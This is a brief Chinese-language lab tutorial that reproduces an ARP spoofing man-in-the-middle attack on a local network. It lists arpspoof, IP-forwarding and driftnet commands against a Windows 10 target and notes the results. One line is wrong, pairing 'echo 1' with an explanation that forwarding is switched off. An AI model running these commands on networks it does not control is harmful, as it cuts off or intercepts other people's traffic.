环境配置
攻击机kali 192.168.1.128 桥接模式,桥接的主机的网卡
靶机windows10 192.168.1.103
复现
用到的命令
arpspoof -i eth0 -t 192.168.1.103 192.168.1.1
网卡 靶机 网关
echo 0 > /proc/sys/net/ipv4/ip_forward
echo 1 > /proc/sys/net/ipv4/ip_forward
driftnet -i eth0
攻击前 靶机可以正常上网
输入命令开始攻击 arpspoof -i eth0 -t 192.168.1.103 192.168.1.1 这个时候刷新网页一直转圈圈 主机已经断网
随后开始流量转发 echo 1 > /proc/sys/net/ipv4/ip_forward 意思为将 1写入 /proc/sys/net/ipv4/ip_forward 文件,开启流量转发,这个时候流量会经过kali在到主机,主机已经 能正常上网
echo 1 > /proc/sys/net/ipv4/ip_forward 意思为将 0写入 /proc/sys/net/ipv4/ip_forward 文件,关闭流量转发,主机不能正常上网
输入 driftnet -i eth0 获取当前网卡流量 这个时候如果主机流量http网站,就能截取图片
主机浏览网站
kali截取的图片